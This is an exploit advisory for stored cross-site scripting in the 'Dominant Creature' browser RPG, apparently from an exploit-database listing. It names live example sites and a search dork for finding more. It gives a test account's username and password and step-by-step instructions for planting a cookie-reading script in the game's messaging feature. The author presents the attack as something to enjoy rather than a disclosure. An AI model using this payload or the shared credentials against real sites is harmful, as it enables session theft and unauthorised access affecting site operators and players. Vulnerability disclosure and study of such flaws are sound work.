=================================================================================== Dominant Creature BBG/RPG browser game XSS vulnerabilities =================================================================================== # Exploit Title: Dominant Creature BBG/RPG browser game XSS vulnerabilities # Author: M.Jock3R # Script support: http://www.bbgdev.com/ # Script Download: http://sourceforge.net/projects/dcreature/ # Dork: core engine by Dominant Creature # Category:: webapps # Tested on: windows XP Sp2 FR =================================================================================== Examples: --------- 1) http://creatures.site88.net/ 2) http://dixieandtheninjas.net/goofing/DC/ 3) http://tux.isa-geek.org/rpg/dm/login.php Vuln file: msg.php Vuln code: --------- $m = new Msg; if (isset($_GET["p"]) && isset($_GET["write"])) { $m->Write(); } else { $m->Inbox(); } } Exploit: --------- -You must first login :( You can enter this account .. For test :) http://raw.bplaced.net/games/dominantcreature/ username: m.jock3r password: 01230123 Go to : Duel opponents ==> Search for opponents : choose any user and enter Write message In message box write : <script>alert(document.cookie)</script> Click Send message. -Enjoy playing with XSS :) =================================================================================== Greets To : adelsbm / attiadona / the-code.tk Email : madrido.jocker@gmail.com THANKS TO ALL ALGERIANS HACK3RS ===================================================================================